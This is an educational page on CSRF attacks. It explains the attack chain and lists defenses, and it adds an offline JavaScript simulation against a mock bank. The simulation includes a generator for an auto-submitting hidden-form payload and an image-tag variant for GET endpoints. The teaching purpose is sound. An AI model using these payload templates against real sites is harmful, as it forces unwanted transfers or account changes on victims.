CSRF

Force authenticated users to execute unwanted actions. State-changing attacks.


Cross-Site Request Forgery (CSRF) is an attack that forces authenticated users to execute unwanted actions on a web application. The attacker tricks the victim's browser into making malicious requests using their existing authentication cookies.

How it works:

  • Victim logs into a trusted site (bank.com)
  • Victim visits an attacker-controlled site while still authenticated
  • Attacker's site triggers a forged request to bank.com
  • Browser automatically includes the victim's cookies
  • Server accepts the request as legitimate

Interactive simulation

Simulated attack variant: forged form submission (POST). This is the more common case in practice, and it needs an auto-submitted hidden form on the attacker's page rather than a plain link or image tag.

Vulnerable application

Victim's Banking Session

Session Status: Authenticated
Account Balance: $5,000
Cookie: SESSIONID=user_authenticated_789

CSRF Protection Status

  • No CSRF token: state-changing requests are not protected
  • No SameSite cookie attribute: the session cookie is sent with cross-site requests
  • No Origin/Referer check: the origin of requests is not validated

Defense Best Practices

  • Use cryptographically secure anti-CSRF tokens: generate them from a CSPRNG, bind each one to the user's session, require it on every state-changing request and compare it in constant time.
  • Set SameSite=Strict or SameSite=Lax on session cookies. Lax still sends the cookie on top-level GET navigations and is the default in only some browsers, so it complements tokens rather than replacing them.
  • Validate the Origin header, falling back to Referer; treat a state-changing request that carries neither as a failure, not a pass.
  • Require re-authentication (or a second factor) for sensitive actions such as transfers and password or email changes.
  • Require a custom header (e.g. X-Requested-With) on AJAX endpoints. This works only because a cross-origin request with a custom header triggers a CORS preflight that the attacker's origin fails, so it protects fetch/XHR endpoints only, not form posts, and only while the CORS policy does not allow the attacker's origin.
  • Never use GET for state-changing operations.

CSRF Attack Chain

1. Victim Authenticated: the user logs into bank.com and the browser stores the session cookie.

2. Deliver Malicious Request: the victim is lured, for example by a link in an email, to an attacker-controlled page that embeds the forged request (an auto-submitting form for a POST endpoint, or an image tag for a GET endpoint).

3. Browser Sends Request: the browser issues the cross-site request and automatically attaches the bank.com session cookie.

4. Server Accepts: with no CSRF token, SameSite attribute or Origin check, the server cannot distinguish the forged request from a legitimate one and processes it.
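The five steps under "How it works" and the four-step chain above, run end to end as an added example that is not the page's simulation code: a bank endpoint that authenticates only by cookie, an attacker page with an auto-submitting hidden form (plus the image-tag variant for GET endpoints), and a toy browser that attaches the bank cookie to the cross-site POST because the cookie carries no SameSite attribute. The /transfer endpoint, the field names "to" and "amount", the account balances, the session table and the attacker origin https://evil.example are constructed for this example.

```javascript
// Added example, not the page's simulation code: the CSRF chain run end to
// end offline. The bank's /transfer endpoint, the field names "to" and
// "amount", the accounts, the session table and the attacker origin
// https://evil.example are constructed for this example.

// --- Step 1 (victim authenticated): the bank knows the user only by cookie.
const accounts = { alice: 5000, mallory: 0 };
const sessions = { user_authenticated_789: "alice" }; // SESSIONID value -> user

// The vulnerable handler: no token, no Origin check, so any request the
// browser attaches the cookie to is treated as the victim's own action.
function vulnerableTransfer(req) {
  const user = sessions[(req.cookies || {}).SESSIONID];
  if (!user) return { status: 401 };
  const amount = Number(req.body.amount);
  if (!(amount > 0) || accounts[user] < amount) return { status: 400 };
  accounts[user] -= amount;
  accounts[req.body.to] = (accounts[req.body.to] || 0) + amount;
  return { status: 200, balance: accounts[user] };
}

// --- Step 2 (deliver the forged request): the attacker's page carries a
// hidden form that submits itself; the victim sees nothing and clicks nothing.
function attackerPage(action, fields) {
  const esc = (s) => String(s).replace(/[&<>"']/g, (c) => `&#${c.charCodeAt(0)};`);
  const inputs = Object.entries(fields)
    .map(([k, v]) => `<input type="hidden" name="${esc(k)}" value="${esc(v)}">`)
    .join("\n");
  return `<html><body>
<form id="f" method="POST" action="${esc(action)}">
${inputs}
</form>
<script>document.getElementById("f").submit();</script>
</body></html>`;
}

// The GET variant needs no form at all: if an endpoint changes state on GET,
// an image load is enough (no JavaScript, and it works inside HTML email).
function attackerImageTag(url) {
  return `<img src="${url}" width="0" height="0" alt="">`;
}

// --- Step 3 (browser sends request): a toy browser that parses the form and
// builds the cross-site POST. The cookie jar is keyed by the target host,
// and with no SameSite attribute the bank cookie goes along.
function browserSubmitsForm(html, cookieJar) {
  const unesc = (s) => s.replace(/&#(\d+);/g, (_, n) => String.fromCharCode(n));
  const action = unesc(html.match(/action="([^"]*)"/)[1]);
  const body = {};
  for (const m of html.matchAll(/name="([^"]*)" value="([^"]*)"/g)) body[unesc(m[1])] = unesc(m[2]);
  const host = new URL(action).host;
  return {
    method: "POST",
    url: action,
    headers: { origin: "https://evil.example", referer: "https://evil.example/" },
    cookies: cookieJar[host] || {},
    body,
  };
}

// --- Step 4 (server accepts): run the whole chain from a fresh state.
function runAttack() {
  accounts.alice = 5000;
  accounts.mallory = 0;
  const victimJar = { "bank.com": { SESSIONID: "user_authenticated_789" } };
  const page = attackerPage("https://bank.com/transfer", { to: "mallory", amount: 5000 });
  const forged = browserSubmitsForm(page, victimJar);
  const result = vulnerableTransfer(forged);
  return { forged, result, accounts: { ...accounts } };
}

console.log(JSON.stringify(runAttack(), null, 2));
```

Run it with node and inspect the forged request: the Origin and Referer headers plainly say evil.example and the body carries no token, yet the handler only looks at the cookie, so the $5,000 moves. Removing the cookie from the jar (what SameSite=Lax would do for this cross-site POST) turns the same request into a 401.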

OPSEC: Training Environment Only

CSRF attacks are illegal without authorization. Always implement anti-CSRF tokens, SameSite cookies and origin validation, and never use GET for state-changing operations. CSRF was listed in the OWASP Top 10 through the 2013 edition (A8) and was dropped in 2017 because most web frameworks now ship built-in protection; it remains common wherever that protection is disabled, bypassed or applied to only some endpoints.